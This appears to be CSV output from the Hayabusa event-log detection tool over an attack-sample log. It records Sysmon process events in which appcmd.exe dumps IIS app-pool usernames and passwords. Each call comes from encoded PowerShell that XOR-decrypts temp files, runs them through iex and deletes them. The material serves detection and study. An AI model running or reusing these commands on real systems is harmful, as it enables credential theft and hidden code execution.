AB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3484 | PGUID: 365ABB72-3D6C-5CEB-0000-00107257FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.110 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2644 | PGUID: 365ABB72-3D6D-5CEB-0000-0010575CFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.190 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2104 | PGUID: 365ABB72-3D6D-5CEB-0000-00101760FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.270 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3240 | PGUID: 365ABB72-3D6D-5CEB-0000-0010D763FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.350 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3096 | PGUID: 365ABB72-3D6D-5CEB-0000-00109767FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.581 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9
ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2928 | PGUID: 365ABB72-3D6D-5CEB-0000-0010576BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.661 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1340 | PGUID: 365ABB72-3D6D-5CEB-0000-00108270FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.731 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.password | Process: 
C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2448 | PGUID: 365ABB72-3D6D-5CEB-0000-00104474FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.811 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3444 | PGUID: 365ABB72-3D6D-5CEB-0000-00100478FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.891 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 560 | PGUID: 365ABB72-3D6D-5CEB-0000-0010C47BFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:17.971 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbA
BlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3196 | PGUID: 365ABB72-3D6D-5CEB-0000-00108C7FFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx 2019-05-27 10:29:18.041 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2472 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C83FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.121 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2896 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C87FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.202 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2524 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC8AFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.282 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3144 | PGUID: 365ABB72-3D6E-5CEB-0000-00108C8EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.352 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3100 | PGUID: 365ABB72-3D6E-5CEB-0000-00104C92FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.432 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3136 | PGUID: 365ABB72-3D6E-5CEB-0000-00100C96FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.522 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 344 | PGUID: 365ABB72-3D6E-5CEB-0000-0010CC99FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.662 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3756 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EF9EFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:18.742 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool "". )"" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3812 | PGUID: 365ABB72-3D6E-5CEB-0000-0010AFA2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
